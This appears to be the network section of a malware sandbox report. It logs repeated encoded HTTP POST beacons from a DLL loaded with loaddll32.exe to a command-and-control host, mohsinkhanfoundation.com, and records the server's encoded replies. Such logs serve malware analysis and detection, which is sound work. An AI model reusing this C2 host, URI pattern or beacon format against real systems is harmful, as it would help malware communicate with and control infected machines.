                                          Date: Mon, 27 Sep 2021 18:26:14 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          38192.168.2.749822107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:15.619729996 CEST1622OUTPOST /pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:15.999859095 CEST1624INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:15 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          39192.168.2.749824107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:16.257204056 CEST1631OUTPOST /pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:16.725260973 CEST1634INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:16 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.749754107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:48.740844011 CEST1009OUTPOST /pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:49.168261051 CEST1019INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:48 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          40192.168.2.749826107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:17.065156937 CEST1641OUTPOST /pcQLeLMbur/fBM5IDlCe3J+YXp8c2J9ZX0= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:17.462534904 CEST1643INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:17 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          41192.168.2.749828107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:18.445357084 CEST1651OUTPOST /pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:18.880369902 CEST1652INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:18 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          42192.168.2.749830107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:20.231148005 CEST1661OUTPOST /pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:20.649101019 CEST1662INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:20 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          43192.168.2.749832107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:20.891990900 CEST1671OUTPOST /pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:21.332444906 CEST1672INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:20 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          44192.168.2.749834107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:21.585212946 CEST1680OUTPOST /pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:22.027040958 CEST1682INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:21 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHtzfUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          45192.168.2.749836107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:22.285861969 CEST1684OUTPOST /pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:22.728055954 CEST1691INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:22 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 7a 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
